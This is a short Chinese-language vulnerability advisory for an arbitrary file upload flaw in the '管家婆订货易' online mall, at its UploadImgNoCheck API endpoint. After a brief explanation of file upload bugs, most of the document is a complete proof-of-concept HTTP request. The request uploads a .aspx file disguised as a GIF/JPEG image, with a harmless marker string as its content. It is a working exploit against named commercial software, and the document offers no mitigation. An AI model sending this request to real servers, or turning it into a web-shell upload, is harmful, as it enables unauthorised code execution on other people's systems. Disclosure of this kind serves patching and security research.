漏洞描述
文件上传漏洞发生在应用程序允许用户上传文件的功能中,如果上传功能未能正确地验证和限制上传文件的类型和内容,攻击者可能利用此漏洞上传恶意文件,如包含可执行代码的脚本文件,从而在服务器上执行任意命令,控制或破坏系统。
管家婆订货易在线商城 UploadImgNoCheck 任意文件上传漏洞
PoC代码
POST /api/Upload/UploadImgNoCheck?m_server_name=ShopUserImg HTTP/1.1
Host:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Length: 195
Content-Type: multipart/form-data; boundary=9463d22c3a07c1abba99eba6b392cc91
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36
--9463d22c3a07c1abba99eba6b392cc91
Content-Disposition: form-data; name="Filedata"; filename="bpor8tnhz9.aspx"
Content-Type: image/jpeg
GIF89a
testxep
--9463d22c3a07c1abba99eba6b392cc91--